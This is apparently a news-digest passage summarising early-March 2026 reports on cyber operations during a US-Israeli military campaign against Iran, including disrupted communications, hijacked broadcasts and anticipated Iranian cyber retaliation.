Cyber operations significantly supported the recent U.S.-Israeli military campaign against Iran, which resulted in the death of Supreme Leader Ali Khamenei. U.S. Gen. Dan Caine confirmed that coordinated cyber efforts disrupted Iranian communications and sensor networks. Israel hijacked state media broadcasts to influence public sentiment and utilized hacked traffic cameras for intelligence. Additionally, hackers breached an Iranian prayer app to send pro-liberation messages. Iranian cyber responses have been largely ineffective.
2026-03-03 | Risky.Biz: Risky Bulletin: Cyber Command conducted cyberattacks ahead of Iran strikes
US Cyber Command executed cyber operations to disrupt Iranian defenses prior to a US-Israeli military strike that resulted in the death of Iran's leader Ali Khamenei. The operations, which included disrupting communications and sensor networks, were complemented by Israeli cyber units targeting mobile towers. Iranian responses included missile attacks on US bases and potential cyber retaliation, although internet outages hindered immediate cyber operations. Cybersecurity firms anticipate various cyber threats from Iran.
2026-03-04 | CSO Online: Iranian cyberattacks fail to materialize but threat remains acute
Five days into the conflict pitting the US and Israel against Iran, no significant Iranian cyberattacks have materialized, but experts caution that the threat remains acute given Iran's active cyber capabilities. The UK NCSC and Canada's CCCS issued warnings about potential Iranian campaigns, while CISA has not updated its guidance since October. The NCSC highlighted an increased risk of indirect cyber threats for organizations with ties to the Middle East.